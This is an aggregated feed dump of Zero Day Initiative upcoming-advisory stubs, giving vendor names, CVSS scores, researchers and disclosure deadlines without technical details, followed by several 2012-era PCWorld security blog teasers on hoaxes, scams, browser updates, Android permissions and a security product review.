==> ZDI-CAN-1768: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1767: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1766: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1765: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1761: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1760: Hewlett-Packard, Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1759: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1752: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1749: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1745: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1744: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1741: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1730: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1729: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1624: GE

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'ZombiE and amisto0x07' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1623: GE

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'ZombiE and amisto0x07' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1622: GE

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'ZombiE and amisto0x07' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1621: GE

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'ZombiE and amisto0x07' was reported to the affected vendor on: 2013-02-22, 108 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1743: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-15, 115 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1742: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-15, 115 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1735: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Tenable Network Security' was reported to the affected vendor on: 2013-02-15, 115 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1734: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Tenable Network Security' was reported to the affected vendor on: 2013-02-15, 115 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1772: ABB

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-13, 117 days ago. The vendor is given until 2013-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1747: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-13, 117 days ago. The vendor is given until 2013-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1688: Avaya

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-13, 117 days ago. The vendor is given until 2013-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1478: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-02-11, 119 days ago. The vendor is given until 2013-08-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1746: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-01, 129 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1718: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-02-01, 129 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1717: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-02-01, 129 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1713: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Mil3s beep' was reported to the affected vendor on: 2013-02-01, 129 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1565: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-02-01, 129 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1684: Citrix

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Mil3s beep' was reported to the affected vendor on: 2013-01-23, 138 days ago. The vendor is given until 2013-07-22 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1736: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 139 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1698: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'axtaxt' was reported to the affected vendor on: 2013-01-22, 139 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1690: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 139 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1671: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 139 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1670: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 139 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1669: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 139 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1676: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'agix' was reported to the affected vendor on: 2013-01-08, 153 days ago. The vendor is given until 2013-07-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1726: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-01-07, 154 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1678: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-07, 154 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1579: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2013-01-07, 154 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1601: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Soroush Dalili' was reported to the affected vendor on: 2012-11-21, 201 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1595: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 8.5 (AV:N/AC:L/Au:N/C:C/I:P/A:N) severity vulnerability discovered by 'Mak Kolybabi' was reported to the affected vendor on: 2012-11-21, 201 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1578: MySQL

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2012-11-21, 201 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1559: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Nicolas Gregoire' was reported to the affected vendor on: 2012-11-21, 201 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1687: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1664: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1662: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.7 (AV:U/AC:U/Au:N/C:C/I:N/A:N) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1647: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1644: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1641: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'G. Geshev' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1628: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1620: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tobias Klein' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1607: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1606: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1603: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher & Paul Bates' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1566: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-11-19, 203 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1577: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-10-24, 229 days ago. The vendor is given until 2013-04-22 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1510: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 453 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1509: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 453 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> Don’t fall for the Facebook privacy notice hoax

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Have you posted the notice to your Facebook timeline to proclaim your copyright ownership of all content? Have you seen others from your social network posting such a notice? If you havent already, dont bother. Its a hoax. Its not even a new hoax. Its a resurgence of an old hoax that many users fell for earlier this year when Facebook became a publicly-traded company. The previous hoax implied that the change from a private company to a public one somehow changed the rules of the privacy agreement and put your posts and photos at risk unless you posted a copy and paste of a disclaimer establishing your copyright ownership. You can't change the Facebook legal terms by posting on your timeline. The new one reads: In response to the new Facebook guidelines I hereby declare that my copyright is attached to all of my personal details, illustrations, paintings, writing, publications, photos and videos, etc. (as a result of the Berne Convention). To read this article in full or to leave a comment, please click here

==> With shopping scams on the rise, watch for these threats

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Tomorrow is Thanksgiving, which means only one thingthe glorious chaos we call the Holiday Shopping Season will soon be upon us. Holiday shopping also means a spike in online scams, fraud, and malware, so you need to be aware of the risks and threats, and exercise some common sense to avoid a cyber-Grinch incident. Intrepid shoppers will line up for Black Friday deals that have spilled over to Thanksgiving Thursday. You can now start your Black Friday shopping between the turkey feast and the pumpkin pie, before the football games are even over on Thanksgiving Day. The definition of Friday aside, holiday shopping will officially be underway. Black Friday will be followed by Cyber Monday, and many shoppers will turn to their mobile devices to find great deals, so its primetime for cybercriminals. Be careful what apps you install and what you click on from your mobile device. Rising threat of mobile scams and malware Black Friday is generally an in-person, brick-and-mortar-store shopping experience, but competition from online retailers and Cyber Monday, combined with the explosion of connected shoppers armed with mobile devices, has changed the game. A report from iovation, a mobile device security and reputation management company, claims that online retail transactions from mobile devices have increased 300 percent over last year. Mobile transactions accounted for nearly one in ten purchases in the most recent quarter, and that number is expected to spike up for holiday shopping. To read this article in full or to leave a comment, please click here

==> US teens lead the way for shady, risky online behavior

http://feeds.pcworld.com/pcworld/blogs/security_alert/ What does your teen do when he or she is online? Do you know? Teens in general partake in riskier online behavior than your average user, but according to a recent study from McAfeeExploring the Digital Divideteens in the United States are even more likely to engage in shady online activities. The new report is a follow up to McAfees The Digital Divide: How the Online Behavior or Teens Is Getting Past Parents, released earlier this year. The original survey focused solely on the United States, but the new one expands the scope to include teens in European countries for comparison. The results might be a bit discouraging for parents of US teens. Teens in the United States lead in almost every category of shady online behavior. Nearly a third of US teens have used the Web to intentionally surf for bleep. US teens also lead in using mobile devices to cheat on tests, and are tied for second in using the Internet as a platform for cyber bullyingonly half a percentage point behind the Netherlands. Go USA? To read this article in full or to leave a comment, please click here

==> Here's how to secure your email and avoid becoming a ‘Petraeus’

http://feeds.pcworld.com/pcworld/blogs/security_alert/ It was a shock when David Petraeusa respected and highly-decorated Army generalabruptly stepped down from his post as the director of the CIA earlier this week. It was even more of a jolt to learn that his resignation was due to an extramarital affair. But, the real story might be the fact that the affair came to light more or less accidentally as a result of poor email and privacy practices. First, a little background on how things went down. The affair between David Petraeus and his biographer Paula Broadwell seems like something from the Showtime series Homeland, or perhaps a James Bond plot line, but the events that led to the FBI investigation that uncovered the affair are a bit more Fatal Attraction. Broadwell sent anonymous threatening emails to another woman she considered to be competition for Petraeus affection, and that womanJill Kelleyinitiated the investigation that eventually unraveled the affair and led to the downfall of one of this generation's greatest American heroes. I dont want to teach anyone how to cover their illicit tracks better, or how to have a more clandestine affair, but lets take a look at where Petraeus and Broadwell went wrong so you can understand how to cover your tracks better in general, and how to secure your email and protect your privacy online. To read this article in full or to leave a comment, please click here

==> Out of date, vulnerable browsers put users at risk

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Is your browser up to date? According to the results of a new survey from Kasperskya security software vendornearly a quarter of the browsers currently in use are out of date. Surfing the Web with a vulnerable browser is a recipe for disaster. The Web browser has evolved to become the primary software used on many PCs. People access their email, surf websites, create documents and spreadsheets, access cloud-based file storage and sharing sites, and share with others on social networking sitesall through the browser. Attackers no this as well, which is why it is exceptionally risky to use a browser with known vulnerabilities. Kaspersky gathered anonymous data through its cloud-based Kaspersky Security Network. Kaspersky researchers analyzed the browser usage data from millions of customers around the world, and uncovered some concerning trends. * 23 percent of browsers are not current: 14.5 percent are still using the previous version, while 8.5 percent are using even older, obsolete versions. * When a new version of a browser is released, it can take nearly 10 days for it to surpass the previous version in usage, and an average of about a month for a majority of users to upgrade. Keep your browser up to date to avoid Web-based attacks. The major browsers all have automatic update mechanisms in place. The easiest way to make sure your browser is current is to enable the automatic updates and let them do what theyre meant to dokeep your browser up to date without requiring you to manage the process yourself. To read this article in full or to leave a comment, please click here

==> Study finds 25 percent of Android apps to be a security risk

http://feeds.pcworld.com/pcworld/blogs/security_alert/ According to a new report from Bit9a security vendor with a focus on defending against advanced persistent threats (APT)there is a one in four chance that downloading an Android app from the official Google Play market could put you at risk. Bit9 analyzed 400,000 or so apps in Google Play, and found over 100,000 it considers to be on the shady side. Does that mean that the sky is falling, and everyone with an Android smartphone or tablet should abandon it immediately? No. The research by Bit9 illustrates some issues with app development in general, and should raise awareness among mobile users to exercise some discretion when downloading and installing apps, but its not a sign of any urgent crisis affecting Android apps. Use discretion rather than blindly granting permissions to apps. The report from Bit9 isnt about apps that contain malware, or are even overtly malicious for that matter. Bit9 reviewed the permissions requested by the apps, and examined the security and privacy implications of granting those permissions. The reality is that many apps request permission to access sensitive content they have no actual need for. Bit9 says that 72 percent of all Android apps in the Google Play market request access to at least one potentially risky permission. For example, 42 percent request access to GPS location data, 31 percent want access to phone number and phone call history, and 26 percent ask for permission to access personal information. Bit9 discovered 285 apps that use 25 or more system permissions. To read this article in full or to leave a comment, please click here

==> Webroot SecureAnywhere 2013 adds protection for Mac OS X

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Webroot SecureAnywhere 2013 is here. The new security suite from Webroot includes a variety of updates in the areas of performance, and the overall user experience. But, the most notable feature of SecureAnywhere 2013 is that it now also protects Mac OS X. Lets start with a look at SecureAnywhere in general. While the overall goal of the software is the same as competing antimalware and security suites, and it seems logical to compare them, SecureAnywhere is a whole new approach. Webroot completely threw out its flagship products, and started over by building SecureAnywhere around a more proactive philosophy based off the acquisition of Prevx. Webroot logoWebroot SecureAnywhere is a whole different approach to defending against malware. The result is protection for your PCs and mobile devices that delivers blazing performance, and has virtually no impact on system resources compared with the traditional approach of rival products. The entire install occupies a mere 750KBwith a Kon your hard drive. It installs in seconds, and according to metrics from Webroot, the software uses 91 percent less memory than competitors, and completes full system scans in about a minute116 times faster than average antimalware scans. SecureAnywhere is a comprehensive security suite that includes a built-in firewall (only in Webroot SecureAnywhere Complete 2013), identity and privacy protection, social network protection, and seven specialized security shieldsthree of which are new to SecureAnywhere 2013. The USB Shield blocks attacks and malware from removable drives, the Offline Shield protects the system against persistent threats even when its not connected to the Internet, and the Zero Day Shield identifies new or changing threats to defend against emerging attacks. To read this article in full or to leave a comment, please click here

==> The FBI’s Next Generation Identification program could spot faces in a crowded street

